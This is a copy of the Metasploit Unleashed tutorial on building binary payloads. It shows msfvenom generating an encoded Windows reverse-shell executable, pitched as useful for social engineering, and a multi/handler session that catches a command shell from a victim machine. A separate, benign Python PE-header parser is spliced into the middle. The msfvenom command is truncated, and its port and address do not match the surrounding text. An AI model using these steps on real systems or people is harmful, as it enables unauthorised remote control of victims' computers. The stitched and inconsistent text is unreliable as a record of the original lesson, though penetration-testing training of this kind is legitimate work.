09/01/2017

Binary Payloads - Metasploit Unleashed

Binary Payloads
It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an
executable from a Metasploit payload. This can be very useful in situations such as social engineering: if you
can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any
software.

Let's look at a quick example of how to do this. We will generate a reverse shell payload, execute it on a
remote system, and get our shell. To do this we will use the command-line tool msfvenom. This command can
be used for generating payloads to be used in many locations and offers a variety of output options, from perl
to C to raw. We are interested in the executable output, which is provided by the -f exe option.

We'll generate a Windows reverse shell executable that will connect back to us on port 31337.

root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp
Options for payload/windows/shell/reverse_tcp:

       Name: Windows Command Shell, Reverse TCP Stager
     Module: payload/windows/shell/reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 281
       Rank: Normal

Provided by:
    spoonm
    sf
    hdm
    skape

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Spawn a piped command shell (staged). Connect back to the attacker

root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
Saved as: /tmp/1.exe

root@kali:~# file /tmp/1.exe
/tmp/1.exe: PE32 executable (GUI) Intel 80386, for MS Windows
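
The fields that file reports above (PE32, GUI, Intel 80386) are read directly from the PE headers, which is also where triage of an unknown Windows binary starts. The following Python parser is an added example, not part of the original page: `describe_pe` and `build_sample_header` are hypothetical names, and the sample header is constructed inline rather than taken from a real file.

```python
import struct

MACHINES = {0x014C: "Intel 80386", 0x8664: "x86-64"}
FORMATS = {0x10B: "PE32", 0x20B: "PE32+"}
SUBSYSTEMS = {2: "GUI", 3: "console"}
IMAGE_FILE_DLL = 0x2000  # COFF Characteristics flag


def describe_pe(data: bytes) -> str:
    """Summarise a PE image from its headers; raise ValueError if malformed."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ (DOS) header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of "PE\0\0"
    opt = e_lfanew + 24  # 4-byte signature + 20-byte COFF header
    if opt + 70 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing or truncated PE header")
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    (chars,) = struct.unpack_from("<H", data, e_lfanew + 22)
    (magic,) = struct.unpack_from("<H", data, opt)
    # Subsystem sits at offset 68 of the optional header in both PE32 and PE32+.
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    fmt = FORMATS.get(magic, f"unknown format 0x{magic:04x}")
    kind = "executable (DLL)" if chars & IMAGE_FILE_DLL else "executable"
    subsys = SUBSYSTEMS.get(subsystem, f"subsystem {subsystem}")
    mach = MACHINES.get(machine, f"machine 0x{machine:04x}")
    return f"{fmt} {kind} ({subsys}) {mach}, for MS Windows"


def build_sample_header(machine=0x014C, magic=0x10B, subsystem=2, chars=0x0102):
    """Constructed sample: headers only, no sections or code."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0xE0, chars)
    optional = struct.pack("<H", magic) + b"\0" * 66 + struct.pack("<H", subsystem)
    return dos + coff + optional


if __name__ == "__main__":
    print(describe_pe(build_sample_header()))
```
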

Ok, now we see we have a Windows executable ready to go. Now we will use multi/handler, which is a stub
that handles exploits launched outside of the framework.

root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

When using the exploit/multi/handler module, we still need to tell it which payload to expect, so we configure
it to have the same settings as the executable we generated.

msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 172.16.104.130
LHOST => 172.16.104.130
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) >

Now that we have everything set up and ready to go, we run exploit for the multi/handler and execute our
generated executable on the victim. The multi/handler handles the exploit for us and presents us with our shell.

msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victim\My Documents>

https://www.offensive-security.com/metasploit-unleashed/binary-payloads/
